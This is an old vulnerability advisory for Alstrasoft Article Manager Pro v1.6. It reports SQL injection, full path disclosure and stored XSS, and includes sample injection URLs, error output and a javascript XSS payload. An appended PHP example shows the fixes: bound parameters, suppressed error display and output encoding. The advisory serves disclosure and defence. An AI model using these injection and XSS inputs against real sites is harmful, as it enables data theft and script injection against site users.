Bug: Alstrasoft Article Manager Pro v1.6 ( Ascii Version )


Alstrasoft Article Manager Pro v1.6

Published: 2006.05.25
Credit: luny youfucktard com
Risk: Medium
CWE: N/A
CVE: CVE-2006-2567, CVE-2006-2566, CVE-2006-2565
Local: No
Remote: Yes

Alstrasoft Article Manager Pro v1.6 - XSS & Full Path errors

Homepage:

http://www.alstrasoft.com

Description:

Article Manager Pro is the next generation article publishing system designed to make your life a whole lot easier by
enabling webmasters to publish articles or news into their website in a matter of minutes with our advanced WYSIWYG
editor that includes features such as a built-in spell checker, word finder and many more.

Affected files:

profile.php

userarticles.php

submit_article.php

mrarticles.php

admin.php

Exploits & Vulns:

SQL Injection query error

http://www.example.com/article/profile.php?author_id=1'

1064 : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

SQL Injection:

http://www.example.com/article/userarticles.php?aut_id=3 or 3=3--

Proof Of Concept:

All articles in the DB appear on the page when the above query is performed.

Full path errors

http://www.example.com/article/userarticles.php?aut_id=3'

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html/article/functions.php on line 212

Invalid user id supplied!

http://www.example.com/article/mrarticles.php?action=read'

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html/article/mrarticles.php on line 50

http://www.example.com/article/admin/admin.php?login

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html/article/admin/auth.php on line 18

submit_article.php XSS Vuln.

When an article is submitted through submit_article.php, the input is not filtered. All the user has to do is enter something like <DIV STYLE="background-image: url(javascript:alert('XSS'))">
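An added example (not part of the original advisory and not Alstrasoft's code) showing the remediation pattern for the three issue classes reported above: the numeric id parameter is validated and bound instead of concatenated, PHP warnings are logged rather than displayed, and stored text is encoded on output. The `articles` table, the function names and the in-memory SQLite database (via PDO, standing in for the application's MySQL backend) are assumptions made for illustration.

```php
<?php
// Added example: hypothetical schema and function names; not Alstrasoft's code.
ini_set('display_errors', '0');   // keep warnings (and file paths) out of responses
ini_set('log_errors', '1');       // still record them server-side

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, author_id INTEGER, title TEXT)');
// Constructed sample rows; the third title is the markup from the XSS report.
$ins = $db->prepare('INSERT INTO articles (author_id, title) VALUES (?, ?)');
foreach ([[3, 'Article by author 3'], [4, 'Article by author 4'],
          [3, '<DIV STYLE="background-image: url(javascript:alert(\'XSS\'))">']] as $row) {
    $ins->execute($row);
}

// Vulnerable pattern: the parameter is concatenated into the statement.
function titles_concat(PDO $db, string $autId): array {
    return $db->query("SELECT title FROM articles WHERE author_id = $autId")
              ->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened pattern: strict integer check, then a bound parameter.
function titles_bound(PDO $db, string $autId): array {
    $id = filter_var($autId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];                 // caller shows a generic "invalid id" message
    }
    $stmt = $db->prepare('SELECT title FROM articles WHERE author_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// The three inputs are the aut_id values shown in the advisory.
foreach (['3', '3 or 3=3--', "3'"] as $input) {
    try {
        $concat = count(titles_concat($db, $input));
    } catch (PDOException $e) {
        error_log($e->getMessage());   // details go to the log, not the page
        $concat = 'error';
    }
    printf("%-12s concat=%s bound=%d\n", $input, $concat, count(titles_bound($db, $input)));
}

// Output encoding for stored titles: the markup is rendered as text.
foreach (titles_bound($db, '3') as $title) {
    echo htmlspecialchars($title, ENT_QUOTES, 'UTF-8'), "\n";
}
```

The concatenated query returns every row for the tautology input and raises a database error for the trailing quote, while the bound version rejects both before any SQL is executed.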

Copyright 2014, cxsecurity.com